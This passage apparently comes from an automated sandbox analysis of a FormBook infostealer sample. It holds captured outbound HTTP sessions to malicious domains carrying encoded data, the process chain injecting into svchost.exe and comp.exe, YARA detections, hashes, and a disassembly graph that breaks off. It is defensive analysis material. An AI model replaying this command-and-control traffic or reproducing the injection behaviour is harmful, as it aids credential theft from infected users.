                                                          Data Ascii: WLtH=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKNFpgDtDufUMIGsAqjcGfjOoOrmb1jV/X5/25fzQ9Wqdjwi4si1i3FukLwK9w9c9YdTnQWdxRFHlTHlwqZvObzs6GzcA4uu9/hQyvRO+uItvsTZUPFQQj6ZrRhYihevIodlr/JkPIygODM5k0jzSws5cvc7YizN6OCoJXHFILejGcKt/nZ+ozHtCr1lb38N4z+hNSR+2llXSD1yXLaCSYYdDwVb1lG6MQpSrJ1e710btjZH2VorYHnzDUEeRXZN7iKYlhbvsFVyHnubGKXKzRTfpYbeVUzmpraefYAlQvZFbCZYQM8E4bN/433iAJ8Cak9MAR/msttrKg54jT80c95q8EMaPwWSFiwiGPXcYyQtzMKdWR+yQoPPGVeGe6SO3k1Lw1kndLNlNoQDTITCx5oBJeZR3kpHzHENxogYluWazUX8q5cxmIwhKNMZbfUqW7a+CgmkUiLSXsEF6ODYjhVI547AWZb6osc3QLuDfrsqYzv4cVII/adWCCMLWs9ZTepFAT73xUs+9wyATTpTVLJQCZHuxFUYiXhE572/IIXtvTtvMRd4sc6g8+8+b8dNf5Wf6V0PMt6lPAY1Ky5Vt94F3NKq46lo3yNW2EJEDjn7AAY//9dF0Lwgyw5t4lPrC5pQQOI0ETeYqWi3rGKgBBLKr/qv7rYmTATxPrealE7e2YE08O39nbMAlsBT01gHmTHdA99CRobKcXhLvzbeXJ72uDIse3dgBcmkYe0axFfxIlk3GcLvTUnm9TuNRkX0f5v4OioKzs56FtV+k8Qj4CUxNpNoveTYh45WNri4FnS2dYbczcLsnEuglwF5x99Lryn93AbR0yJvKGejONSrB5Fj6QYqIeQCdzEfOLzU9PPip2t8Db9KIdZ6LkZ15aopn9ynUeA15tf/48QVTJxZECCJYbR2OAke0JeRpQTXnFEVCfMh4BpYiH5dtn57512T10rXsktf [TRUNCATED]
                                                          Jan 11, 2025 03:33:55.292889118 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.104999913.248.169.48806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:33:57.397439957 CET587OUTGET /wvsm/?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.sfantulandrei.info
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:34:00.883013010 CET375INHTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Sat, 11 Jan 2025 02:34:00 GMT
                                                          content-length: 254
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 30 2d 3d 43 7a 4a 44 42 66 51 78 4f 54 46 50 4c 26 57 4c 74 48 3d 48 31 70 66 56 65 6c 32 64 72 6c 63 59 44 68 36 70 70 65 51 4b 4c 64 61 4f 39 44 4f 68 6a 36 79 49 4c 38 38 6d 34 6c 6c 48 75 5a 38 34 78 73 6a 69 66 78 54 50 67 42 48 6c 42 59 66 50 52 53 34 65 59 2b 76 37 31 73 2f 62 5a 7a 67 6d 63 57 62 2f 67 71 32 72 47 2b 75 68 57 56 78 38 68 65 58 4c 67 4b 63 70 2f 45 61 50 72 65 36 62 6b 56 49 46 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W0-=CzJDBfQxOTFPL&WLtH=H1pfVel2drlcYDh6ppeQKLdaO9DOhj6yIL88m4llHuZ84xsjifxTPgBHlBYfPRS4eY+v71s/bZzgmcWb/gq2rG+uhWVx8heXLgKcp/EaPre6bkVIFA=="}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.1050000104.21.64.1806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:34:05.944127083 CET836OUTPOST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 193
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 65 72 33 70 43 67 4d 34 72 78 71 71 6d 73 52 49 2f 59 75 77 65 44 62 37 72 5a 47 34 41 32 65 7a 42 4e 73 4e 36 33 43 4c 30 65 35 59 39 45 64 75 55 5a 6d 74 4c 6b 44 69 74 31 41 52 4d 61 52 41 76 50 44 33 4e 52 54 69 5a 6e 4b 61 50 51 34 50 73 49 72 4c 33 70 39 71 67 61 7a 30 43 49 74 44 7a 52 76 61 4e 64 43 45 46 33 61 6e 73 58 76 6b 62 46 79 47 53 49 5a 74 66 38 53 57 71 4b 4d 6b 37 4c 49 79 69 30 47 61 71 49 67 77 62 6b 65 62 2b 75 62 52 68 72 35 42 6c 33 2b 53 70 36 44 78 6f 37 4a 73 6d 47 70 6a 2f 73 4c 2f 38 6f 77 61
                                                          Data Ascii: WLtH=XLwieY+at8m7er3pCgM4rxqqmsRI/YuweDb7rZG4A2ezBNsN63CL0e5Y9EduUZmtLkDit1ARMaRAvPD3NRTiZnKaPQ4PsIrL3p9qgaz0CItDzRvaNdCEF3ansXvkbFyGSIZtf8SWqKMk7LIyi0GaqIgwbkeb+ubRhr5Bl3+Sp6Dxo7JsmGpj/sL/8owa


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.1050001104.21.64.1806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:34:08.499474049 CET860OUTPOST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 217
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 32 7a 50 50 6b 4e 31 53 2b 4c 34 2b 35 59 33 6b 64 76 4a 70 6d 32 4c 6b 4f 64 74 31 38 52 4d 5a 74 41 76 4c 48 33 4d 69 72 6a 59 33 4b 50 4a 51 34 42 6a 6f 72 4c 33 70 39 71 67 61 33 4b 43 49 46 44 7a 69 33 61 4e 38 43 46 5a 6e 61 6b 6c 33 76 6b 4e 31 79 4b 53 49 5a 50 66 39 4f 6f 71 49 30 6b 37 4c 34 79 69 67 71 64 78 59 68 35 45 30 66 34 2f 2b 36 4b 6e 6f 52 78 6a 42 2b 2b 2f 35 2f 69 72 61 30 72 33 58 49 30 73 62 58 78 79 75 46 77 50 65 53 52 35 4f 65 6d 4b 47 44 69 63 63 76 33 34 6c 72 70 49 67 3d 3d
                                                          Data Ascii: WLtH=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoAD2zPPkN1S+L4+5Y3kdvJpm2LkOdt18RMZtAvLH3MirjY3KPJQ4BjorL3p9qga3KCIFDzi3aN8CFZnakl3vkN1yKSIZPf9OoqI0k7L4yigqdxYh5E0f4/+6KnoRxjB++/5/ira0r3XI0sbXxyuFwPeSR5OemKGDiccv34lrpIg==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          27192.168.2.1050002104.21.64.1806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:34:11.044168949 CET1873OUTPOST /0pqe/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1229
                                                          Cache-Control: no-cache
                                                          Origin: http://www.mffnow.info
                                                          Referer: http://www.mffnow.info/0pqe/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Data Raw: 57 4c 74 48 3d 58 4c 77 69 65 59 2b 61 74 38 6d 37 66 4c 6e 70 52 52 4d 34 6a 78 71 72 2f 63 52 49 32 34 75 38 65 44 48 37 72 59 79 6f 41 44 75 7a 50 36 77 4e 30 78 57 4c 35 2b 35 59 78 55 64 71 4a 70 6e 30 4c 6b 57 5a 74 31 78 6b 4d 66 68 41 67 49 50 33 59 44 72 6a 57 33 4b 50 4c 51 34 41 73 49 71 52 33 70 74 55 67 61 48 4b 43 49 46 44 7a 6a 48 61 4c 74 43 46 62 6e 61 6e 73 58 76 6f 62 46 79 75 53 49 42 31 66 39 4b 34 74 38 41 6b 36 76 55 79 6a 54 53 64 39 59 68 33 46 30 66 65 2f 2b 32 76 6e 6f 4e 62 6a 42 6a 62 2f 36 76 69 6f 76 6c 78 72 31 67 4c 33 61 4c 48 33 39 4d 56 46 49 43 70 78 65 6a 30 43 56 7a 58 4a 76 71 2f 75 42 69 56 55 33 55 65 6b 34 30 4b 2b 59 6e 38 64 53 53 6b 41 66 63 58 36 63 4a 63 31 6a 6d 44 4f 54 30 67 37 68 48 4c 34 74 73 4b 4a 76 78 58 69 78 4f 54 41 58 6b 79 75 4b 66 4a 70 44 4c 7a 6a 57 43 75 2f 49 51 72 58 72 74 6a 56 75 57 53 57 78 77 45 68 68 69 72 74 2b 51 43 4e 51 4a 31 42 71 44 4c 4a 66 4f 63 36 56 6a 33 46 72 78 6a 75 44 5a 4e 41 38 6c 58 69 61 64 37 33 4a 56 4d 45 [TRUNCATED]
                                                          Data Ascii: WLtH=XLwieY+at8m7fLnpRRM4jxqr/cRI24u8eDH7rYyoADuzP6wN0xWL5+5YxUdqJpn0LkWZt1xkMfhAgIP3YDrjW3KPLQ4AsIqR3ptUgaHKCIFDzjHaLtCFbnansXvobFyuSIB1f9K4t8Ak6vUyjTSd9Yh3F0fe/+2vnoNbjBjb/6viovlxr1gL3aLH39MVFICpxej0CVzXJvq/uBiVU3Uek40K+Yn8dSSkAfcX6cJc1jmDOT0g7hHL4tsKJvxXixOTAXkyuKfJpDLzjWCu/IQrXrtjVuWSWxwEhhirt+QCNQJ1BqDLJfOc6Vj3FrxjuDZNA8lXiad73JVMEj2tOi/cT3WWY5ZPZPUekutpu2ta/EBQU5BaFS8tor7Gn3+r93gk1gGmZrPvIfsvC9RulsRHMk2bR02fnquYsyOMor54cIvPQ2d3+uqtDG2nfadIWtUr+Vj6uKNGvxYhrUYo7l0kCD5XI2KiLeBEBmtnADC2XD/cpA3S+R8sm8DeXP2R0YXxv99YW0IdxPc6a1tQadZHLw4Zm7uzhXiQNL/T8L+osm/iM2+qrjNDJMJ9fVwMFIAxCTo+nMspXF5LzrbEt6ArBc3YXECjGBuVH31WnLttb3iGcFBxMg5/S/l+tLAM7lowS4GX5uJ9c2K8kk4MvVN8hSEgaxf2iWZ0Gmu84DC3t2gcHyX+2w3Ri0gpl3M+uXCCWs1W1KQURRUQL9Tr9l8ZlNatUzZEgIeB+gz8PP4iaqYqwTCurDWpRaCWObpBz5B7A8ZlEISHhm7jfxPA2xLsjESEZKXG8p38JuInaLodyM6ODX5ByEd9c8NGpQraoWO22dSvBhvqhRkwM3J+0gYSej8kbpMm57nYCirrnjwW3txRghXrlaNLeJTAHqaWUfRp0S2Djefuws6NX335tIWR2q1IIU0FWC+1glggi8XwVMKwFFvdBqNlrH7UdK+bgWQV4HAlJ/NuaN//3dlSjlRGZXniCM6Nf+Ixuv3LU0+xWw9DqXE [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          28192.168.2.1050003104.21.64.1806352C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 03:34:13.586146116 CET580OUTGET /0pqe/?WLtH=aJYCdvvPx+uKS5Ogd0A7vBDK6OZ68qCTbFX0p5fCFhilae8HyBK0z8Ue4klxYsqgBES9oGplOKNa3q3+NTywXADjEmAOq6f7maBI/5zBJpNE8z7ORg==&W0-=CzJDBfQxOTFPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.mffnow.info
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
                                                          Jan 11, 2025 03:34:15.254126072 CET748INHTTP/1.1 567 unknown
                                                          Date: Sat, 11 Jan 2025 02:34:15 GMT
                                                          Content-Length: 17
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ipor0WTLZeT4td727KpOuBTaHuGuEtLMUuDchrjhRd06jSPvUYXxZTPqEgDl%2FtVPVbN1wziuTkbKA2%2FkG9GqITz0kdJPnShXklfqkRaGJz5uqr90wV1r1pi8GBPvuqxRh54%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 900181ad6dd0c358-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=580&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                          Data Ascii: Request too large


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:21:31:10
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\SpCuEoekPa.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SpCuEoekPa.exe"
                                                          Imagebase:0x360000
                                                          File size:1'192'448 bytes
                                                          MD5 hash:9A01CD212369451960342E9CCF98C51D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:21:31:11
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SpCuEoekPa.exe"
                                                          Imagebase:0x40000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1680899176.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1681689182.0000000003720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1682428775.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:21:31:41
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe"
                                                          Imagebase:0x770000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3152822686.0000000004B90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:21:31:43
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\comp.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\comp.exe"
                                                          Imagebase:0x8d0000
                                                          File size:23'552 bytes
                                                          MD5 hash:712EF348F7032AA1C80D24600BA5452D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150179402.0000000000670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150964448.0000000002970000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3150708105.0000000002920000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:8
                                                          Start time:21:31:57
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\tDVekXEfsqchvwuVwhexKfPRRsSGVQBDpcuyekfnooHAojFPsafO\OGbZSCDMTTWQqW.exe"
                                                          Imagebase:0x770000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3155508857.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false

                                                          General

                                                          Target ID:10
                                                          Start time:21:32:10
                                                          Start date:10/01/2025
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff613480000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:3.4%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:7.5%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:147
                                                            execution_graph 100676 361016 100681 364974 100676->100681 100691 380db6 100681->100691 100683 36497c 100684 36101b 100683->100684 100701 364936 100683->100701 100688 382d40 100684->100688 100791 382c44 100688->100791 100690 361025 100694 380dbe 100691->100694 100693 380dd8 100693->100683 100694->100693 100696 380ddc std::exception::exception 100694->100696 100729 38571c 100694->100729 100746 3833a1 DecodePointer 100694->100746 100747 38859b RaiseException 100696->100747 100698 380e06 100748 3884d1 58 API calls _free 100698->100748 100700 380e18 100700->100683 100702 364951 100701->100702 100703 36493f 100701->100703 100705 3649a0 100702->100705 100704 382d40 __cinit 67 API calls 100703->100704 100704->100702 100757 367667 100705->100757 100709 3649fb 100719 364a28 100709->100719 100775 367d2c 100709->100775 100711 364a1c 100779 367726 100711->100779 100713 364a93 GetCurrentProcess IsWow64Process 100714 364aac 100713->100714 100716 364ac2 100714->100716 100717 364b2b GetSystemInfo 100714->100717 100715 39d864 100771 364b37 100716->100771 100718 364af8 100717->100718 100718->100684 100719->100713 100719->100715 100722 364ad4 100725 364b37 2 API calls 100722->100725 100723 364b1f GetSystemInfo 100724 364ae9 100723->100724 100724->100718 100727 364aef FreeLibrary 100724->100727 100726 364adc GetNativeSystemInfo 100725->100726 100726->100724 100727->100718 100730 385797 100729->100730 100739 385728 100729->100739 100755 3833a1 DecodePointer 100730->100755 100732 38579d 100756 388b28 58 API calls __getptd_noexit 100732->100756 100735 38578f 100735->100694 100736 38575b RtlAllocateHeap 100736->100735 100736->100739 100738 385783 100753 388b28 58 API calls __getptd_noexit 100738->100753 100739->100736 100739->100738 100740 385733 100739->100740 100744 385781 100739->100744 100752 3833a1 DecodePointer 100739->100752 100740->100739 100749 38a16b 58 API calls __NMSG_WRITE 100740->100749 100750 38a1c8 58 API calls 7 library calls 100740->100750 100751 38309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100740->100751 100754 388b28 58 API calls __getptd_noexit 100744->100754 100746->100694 100747->100698 100748->100700 100749->100740 100750->100740 100752->100739 100753->100744 100754->100735 100755->100732 100756->100735 100758 380db6 Mailbox 59 API calls 100757->100758 100759 367688 100758->100759 100760 380db6 Mailbox 59 API calls 100759->100760 100761 3649b8 GetVersionExW 100760->100761 100762 367bcc 100761->100762 100763 367c45 100762->100763 100764 367bd8 __wsetenvp 100762->100764 100765 367d2c 59 API calls 100763->100765 100766 367c13 100764->100766 100767 367bee 100764->100767 100770 367bf6 _memmove 100765->100770 100784 368029 100766->100784 100783 367f27 59 API calls Mailbox 100767->100783 100770->100709 100772 364ad0 100771->100772 100773 364b40 LoadLibraryA 100771->100773 100772->100722 100772->100723 100773->100772 100774 364b51 GetProcAddress 100773->100774 100774->100772 100776 367d3a 100775->100776 100778 367d43 _memmove 100775->100778 100776->100778 100787 367e4f 100776->100787 100778->100711 100780 367734 100779->100780 100781 367d2c 59 API calls 100780->100781 100782 367744 100781->100782 100782->100719 100783->100770 100785 380db6 Mailbox 59 API calls 100784->100785 100786 368033 100785->100786 100786->100770 100788 367e62 100787->100788 100790 367e5f _memmove 100787->100790 100789 380db6 Mailbox 59 API calls 100788->100789 100789->100790 100790->100778 100792 382c50 __ioinit 100791->100792 100799 383217 100792->100799 100798 382c77 __ioinit 100798->100690 100816 389c0b 100799->100816 100801 382c59 100802 382c88 DecodePointer DecodePointer 100801->100802 100803 382cb5 100802->100803 100804 382c65 100802->100804 100803->100804 100862 3887a4 59 API calls __wsopen_nolock 100803->100862 100813 382c82 100804->100813 100806 382d18 EncodePointer EncodePointer 100806->100804 100807 382cec 100807->100804 100811 382d06 EncodePointer 100807->100811 100864 388864 61 API calls 2 library calls 100807->100864 100808 382cc7 100808->100806 100808->100807 100863 388864 61 API calls 2 library calls 100808->100863 100811->100806 100812 382d00 100812->100804 100812->100811 100865 383220 100813->100865 100817 389c1c 100816->100817 100818 389c2f EnterCriticalSection 100816->100818 100823 389c93 100817->100823 100818->100801 100820 389c22 100820->100818 100847 3830b5 58 API calls 3 library calls 100820->100847 100824 389c9f __ioinit 100823->100824 100825 389ca8 100824->100825 100826 389cc0 100824->100826 100848 38a16b 58 API calls __NMSG_WRITE 100825->100848 100834 389ce1 __ioinit 100826->100834 100851 38881d 58 API calls 2 library calls 100826->100851 100828 389cad 100849 38a1c8 58 API calls 7 library calls 100828->100849 100831 389cd5 100832 389ceb 100831->100832 100833 389cdc 100831->100833 100837 389c0b __lock 58 API calls 100832->100837 100852 388b28 58 API calls __getptd_noexit 100833->100852 100834->100820 100835 389cb4 100850 38309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100835->100850 100839 389cf2 100837->100839 100841 389cff 100839->100841 100842 389d17 100839->100842 100853 389e2b InitializeCriticalSectionAndSpinCount 100841->100853 100854 382d55 100842->100854 100845 389d0b 100860 389d33 LeaveCriticalSection _doexit 100845->100860 100848->100828 100849->100835 100851->100831 100852->100834 100853->100845 100855 382d5e RtlFreeHeap 100854->100855 100859 382d87 __dosmaperr 100854->100859 100856 382d73 100855->100856 100855->100859 100861 388b28 58 API calls __getptd_noexit 100856->100861 100858 382d79 GetLastError 100858->100859 100859->100845 100860->100834 100861->100858 100862->100808 100863->100807 100864->100812 100868 389d75 LeaveCriticalSection 100865->100868 100867 382c87 100867->100798 100868->100867 100869 361066 100874 36f76f 100869->100874 100871 36106c 100872 382d40 __cinit 67 API calls 100871->100872 100873 361076 100872->100873 100875 36f790 100874->100875 100907 37ff03 100875->100907 100879 36f7d7 100880 367667 59 API calls 100879->100880 100881 36f7e1 100880->100881 100882 367667 59 API calls 100881->100882 100883 36f7eb 100882->100883 100884 367667 59 API calls 100883->100884 100885 36f7f5 100884->100885 100886 367667 59 API calls 100885->100886 100887 36f833 100886->100887 100888 367667 59 API calls 100887->100888 100889 36f8fe 100888->100889 100917 375f87 100889->100917 100893 36f930 100894 367667 59 API calls 100893->100894 100895 36f93a 100894->100895 100945 37fd9e 100895->100945 100897 36f981 100898 36f991 GetStdHandle 100897->100898 100899 3a45ab 100898->100899 100900 36f9dd 100898->100900 100899->100900 100902 3a45b4 100899->100902 100901 36f9e5 OleInitialize 100900->100901 100901->100871 100952 3c6b38 64 API calls Mailbox 100902->100952 100904 3a45bb 100953 3c7207 CreateThread 100904->100953 100906 3a45c7 CloseHandle 100906->100901 100954 37ffdc 100907->100954 100910 37ffdc 59 API calls 100911 37ff45 100910->100911 100912 367667 59 API calls 100911->100912 100913 37ff51 100912->100913 100914 367bcc 59 API calls 100913->100914 100915 36f796 100914->100915 100916 380162 6 API calls 100915->100916 100916->100879 100918 367667 59 API calls 100917->100918 100919 375f97 100918->100919 100920 367667 59 API calls 100919->100920 100921 375f9f 100920->100921 100961 375a9d 100921->100961 100924 375a9d 59 API calls 100925 375faf 100924->100925 100926 367667 59 API calls 100925->100926 100927 375fba 100926->100927 100928 380db6 Mailbox 59 API calls 100927->100928 100929 36f908 100928->100929 100930 3760f9 100929->100930 100931 376107 100930->100931 100932 367667 59 API calls 100931->100932 100933 376112 100932->100933 100934 367667 59 API calls 100933->100934 100935 